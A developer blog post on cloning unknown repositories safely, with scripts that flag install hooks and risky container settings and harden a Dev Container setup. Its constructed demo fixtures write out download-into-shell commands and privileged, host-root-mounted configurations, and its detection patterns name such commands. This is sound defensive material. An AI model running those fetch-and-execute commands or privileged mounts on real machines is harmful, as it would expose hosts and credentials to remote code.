Safe Repository Cloning for Developers during interviews — Setup #1


As a developer, you’ll eventually be asked to clone a repository you’ve never seen — maybe during a technical interview, maybe for a freelance gig where you have to quickly run and tweak the code.
That’s normal. What’s not normal is blindly running whatever the repo tells you to run.
Over the past few years, more devs have caught malicious or just reckless scripts firing during setup, usually buried in install hooks or convenience scripts. If you treat git clone && npm install && npm start like muscle memory, you're one copy-paste away from a bad day.
Even if you trust the company that gave you the repository, don’t assume the code is automatically safe. They might be completely unaware of the risks hidden in install scripts — or worse, one of their dependencies could be compromised without their knowledge.
That’s why vigilance isn’t just for “sketchy” projects. It’s a habit you should keep, no matter who sends you the code.
This post is a quick, practical guide to cloning unknown code safely.
What Can Go Wrong?
Running unknown code can:
• Exfiltrate secrets: Grab your SSH keys, cloud creds, browser cookies, or environment variables and ship them off.
• Plant persistence: Drop launch agents/services, scheduled tasks, or Git hooks that re-trigger later.
• Cryptomine or DDoS: Burn your CPU/GPU and bandwidth while you’re “just testing.”
• Tamper with your system: Modify shell RC files, PATH, package managers, or Docker daemon settings.
Most of the damage doesn't happen at git clone: cloning only writes files to disk, and a repository cannot ship git hooks that run for you on clone (.git/hooks is not part of what you fetch). It happens when you install or run: install/postinstall scripts, make, docker compose up, pip install, etc.
The common booby traps to look for are:
• Package scripts (Node): preinstall, install, postinstall, prepare in package.json.
• Git hooks installers: tools like Husky run via postinstall and can create hooks that execute on future commits.
• Shell scripts: Anything the README says to curl | bash. Hard pass unless you read it.
• Python: setup.py, pyproject.toml build backends, custom install steps.
• Docker/Compose: privileged: true, host mounts like /:/host, unknown public images, or containers that run as root.
• Makefiles: “friendly” targets that hide destructive commands.
• Binary blobs: Prebuilt executables that you can’t audit easily.
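Here is a first pass you can run against the checkout to surface the traps listed above before typing any install command. It is an added example, not code from the original post: every file in its sample repository is constructed for the demo, and the patterns it greps for are deliberately coarse. A grep cannot prove a repository safe; it only shows the obvious, so a clean run is where your reading starts, not where it ends.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): a grep-level triage of a fresh checkout
# for things that execute at install/setup time. Run it from the dev container's
# terminal before `npm install`, `pip install`, `make` or `docker compose up`.
# A clean run means none of the obvious patterns below were found, nothing more.

AUDIT_N=0
report() { AUDIT_N=$((AUDIT_N + 1)); printf 'FLAG %s\n' "$1"; }

# audit_repo DIR: prints one FLAG line per finding and returns the number of findings.
audit_repo() {
  dir=$1
  AUDIT_N=0

  # Node: lifecycle scripts run automatically on `npm install` / `npm ci`;
  # husky's install step additionally plants git hooks that fire on later commits.
  if [ -f "$dir/package.json" ]; then
    hits=$(grep -nE '"(preinstall|install|postinstall|prepare)"[[:space:]]*:' "$dir/package.json" || true)
    [ -n "$hits" ] && report "package.json lifecycle script(s): $(printf '%s' "$hits" | tr '\n' ' ')"
    grep -qE '"husky"[[:space:]]*:' "$dir/package.json" && report "husky dependency (installs git hooks)"
  fi

  # README: `curl ... | bash` executes whatever the server returns, unread.
  for f in "$dir"/README "$dir"/README.*; do
    [ -f "$f" ] || continue
    grep -qE '(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(ba|z)?sh' "$f" \
      && report "${f#"$dir/"}: pipes a download into a shell"
  done

  # Python: setup.py is arbitrary code run by pip; an in-tree build backend is the same thing in pyproject form.
  [ -f "$dir/setup.py" ] && report "setup.py: arbitrary Python executes at pip install"
  [ -f "$dir/pyproject.toml" ] && grep -q 'backend-path' "$dir/pyproject.toml" \
    && report "pyproject.toml: in-tree build backend (repo code runs at build time)"

  # Docker/Compose: privileged containers, host root mount, Docker socket, host namespaces.
  for f in "$dir"/docker-compose.yml "$dir"/docker-compose.yaml "$dir"/compose.yml "$dir"/compose.yaml; do
    [ -f "$f" ] || continue
    grep -qE 'privileged:[[:space:]]*true|docker\.sock|-[[:space:]]*/:/|(pid|network_mode):[[:space:]]*"?host' "$f" \
      && report "${f#"$dir/"}: privileged / host mount / host namespace"
  done

  # Makefile: friendly target names hiding download-into-shell, sudo or recursive deletes.
  [ -f "$dir/Makefile" ] \
    && grep -qE '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|sudo[[:space:]]|rm[[:space:]]+-rf' "$dir/Makefile" \
    && report "Makefile: a target runs curl|sh, sudo or rm -rf"

  # Binary blobs: ELF, PE (MZ) or Mach-O headers mean code you cannot read before running it.
  bins=$(find "$dir" -path "$dir/.git" -prune -o -type f -print | while IFS= read -r f; do
           case "$(dd if="$f" bs=4 count=1 2>/dev/null | od -A n -t x1 | tr -d ' \n')" in
             7f454c46|4d5a*|cefaedfe|cffaedfe|feedface|feedfacf) printf '%s\n' "$f" ;;
           esac
         done)
  while IFS= read -r f; do
    [ -n "$f" ] && report "native executable: ${f#"$dir/"}"
  done <<EOF
$bins
EOF

  return "$AUDIT_N"
}

# make_sample_repo: builds a constructed, deliberately booby-trapped checkout in a temp
# directory (every file here is invented for the demo) and prints its path.
make_sample_repo() {
  r=$(mktemp -d)
  mkdir -p "$r/bin"
  cat > "$r/package.json" <<'EOF'
{
  "name": "interview-task",
  "scripts": { "postinstall": "node scripts/setup.js", "start": "node index.js" },
  "devDependencies": { "husky": "^9.0.0" }
}
EOF
  printf 'Setup: run `curl -fsSL https://example.invalid/setup.sh | bash` first.\n' > "$r/README.md"
  printf 'from setuptools import setup\nsetup(name="task")\n' > "$r/setup.py"
  printf 'services:\n  app:\n    image: someone/tool:latest\n    privileged: true\n    volumes:\n      - /:/host\n' > "$r/docker-compose.yml"
  printf 'setup:\n\tcurl -s https://example.invalid/x.sh | sh\n' > "$r/Makefile"
  printf '\177ELF\002\001\001' > "$r/bin/helper"   # fake ELF header only, not a real binary
  echo "$r"
}
```

Source the file in the container terminal and call `audit_repo .` from the project folder; the exit status is the number of findings, so it can also gate a script (`audit_repo . || echo "read the flags before installing"`). On the constructed sample it reports seven findings, one per trap category above; a package.json with only a start script reports none.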
Unfortunately, during a job interview or your first freelance gig, stress can cloud your judgment. You just want to get the code running and show results — so you skip the careful review.
That’s exactly when you’re most vulnerable. Malicious or risky scripts are often subtle, buried deep in install steps or disguised as harmless setup commands. Some are so well-hidden that even experienced developers miss them at first glance.
The solution?
Plenty of tools can isolate a repository, but there is one that is very easy to use and that I suggest every time: VS Code Dev Containers.
You just need to follow the steps:
Install VS Code (most of the time, this step is already done 😉)
Install Docker (Docker Desktop for macOS)
Install Dev Container Extension in VS Code
In VS Code, open the command palette (Ctrl+Shift+P or Cmd+Shift+P on macOS)
Type Dev Containers
Choose the action "Dev Containers: Clone Repository in Container Volume…"
Enter the url of the repository
Select an image to run the project. For JavaScript the "Node.js & TypeScript" image works very well. Note that if the repository already contains a .devcontainer/devcontainer.json, the extension uses that configuration instead of asking you for an image, so read that file before you let it build.
Notice that if the repository is provided as a zip, you can follow similar steps:
Choose the action "Dev Containers: New Dev Container"
Drag and drop the zip file into the Explorer view of the VS Code window that is connected to the container
Open the terminal
Type the command "unzip <zip filename>"
At the end, you have a working project in VS Code that is isolated from the rest of your machine: the clone lives in a named Docker volume and nothing from your home directory is mounted into the container. If you open "Terminal" > "New Terminal", you also get a terminal inside that container, which is where every install or run command from the README should be typed.
Two caveats before you lean on that isolation. First, the container is only as tight as its configuration: a repository can ship its own .devcontainer/devcontainer.json, and that file can ask for privileged mode, host mounts, or an initializeCommand (which the extension runs on your host, not in the container), so check it before opening. Second, by default the extension forwards your local SSH agent into the container and copies your ~/.gitconfig (and reuses an HTTPS credential helper if you have one), so code running inside can still authenticate as you; unload your keys (ssh-add -D) or start without an agent if the project doesn't need them.
You then have a full developer environment. You won't have your other VS Code extensions or your favorite shell aliases, but it is a good compromise to be safe.
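To make the container setup above a little stricter, here is the configuration I would drop into an untrusted checkout before reopening it, plus a check for the settings a repository-supplied devcontainer.json must not carry. This is an added example, not code from the original post or from the Dev Containers project. The image tag mcr.microsoft.com/devcontainers/typescript-node:22, the node user inside it, the extra runArgs and the sample "risky" config are all assumptions made for the demo.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): a hardened devcontainer.json for an
# untrusted checkout, plus a check for the settings a repo-supplied config must not have.
# Assumptions, not facts from the post: the image tag, its "node" user and the runArgs.

# write_safe_devcontainer DIR: writes DIR/.devcontainer/devcontainer.json and DIR/.npmrc.
# - remoteUser "node": editor and terminal run unprivileged inside the container.
# - no "mounts": the only filesystem the code sees is the container volume.
# - npm_config_ignore_scripts + .npmrc ignore-scripts: npm skips preinstall/postinstall/prepare,
#   so husky and friends cannot run until you have read them and opt in with `npm rebuild <pkg>`.
write_safe_devcontainer() {
  mkdir -p "$1/.devcontainer"
  cat > "$1/.devcontainer/devcontainer.json" <<'EOF'
{
  "name": "untrusted-checkout",
  "image": "mcr.microsoft.com/devcontainers/typescript-node:22",
  "remoteUser": "node",
  "containerEnv": { "npm_config_ignore_scripts": "true" },
  "runArgs": ["--security-opt=no-new-privileges"]
}
EOF
  printf 'ignore-scripts=true\n' > "$1/.npmrc"
}

# devcontainer_is_risky FILE: exit 0 if FILE asks for something that breaks the isolation:
# privileged mode, extra capabilities, host namespaces, the Docker socket, a bind mount of /,
# or an initializeCommand (which the extension runs on the HOST before the container exists).
devcontainer_is_risky() {
  grep -qE '"privileged"[[:space:]]*:[[:space:]]*true|--privileged|"capAdd"|--cap-add|--pid=host|--network=host|docker\.sock|source=/,|"source"[[:space:]]*:[[:space:]]*"/"|"initializeCommand"' "$1"
}

# make_risky_devcontainer: writes a constructed (invented) repo-supplied config to a temp
# directory and prints its path, for the demo below.
make_risky_devcontainer() {
  d=$(mktemp -d)
  cat > "$d/devcontainer.json" <<'EOF'
{
  "image": "someone/dev-image:latest",
  "privileged": true,
  "mounts": ["source=/,target=/host,type=bind"],
  "initializeCommand": "curl -fsSL https://example.invalid/prep.sh | sh"
}
EOF
  echo "$d/devcontainer.json"
}
```

Use `devcontainer_is_risky .devcontainer/devcontainer.json` on what the repository ships (it is a grep, so it will not see through a config that builds the same settings from a Dockerfile or a compose file you also need to read), and `write_safe_devcontainer .` to replace it with the known configuration before reopening in the container. With install scripts ignored, a package that genuinely needs its postinstall step (native addons, for example) will fail at run time rather than silently; rebuild just that one with `npm rebuild <pkg>` after reading its script.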
Next time you have to download a repository for an interview or freelance gig, please follow these steps and don't put your machine in danger.
Written by

Thibault Friedrich
I am a French frontend/React developer living in Montréal 🍁. I love everything about science fiction and UX design. One of my new passions is also Code Craftsmanship. I am currently working happily for a Canadian company as a Senior Frontend Developer. I am also the main contributor to a learning platform for front-end developers: Learn_frontend.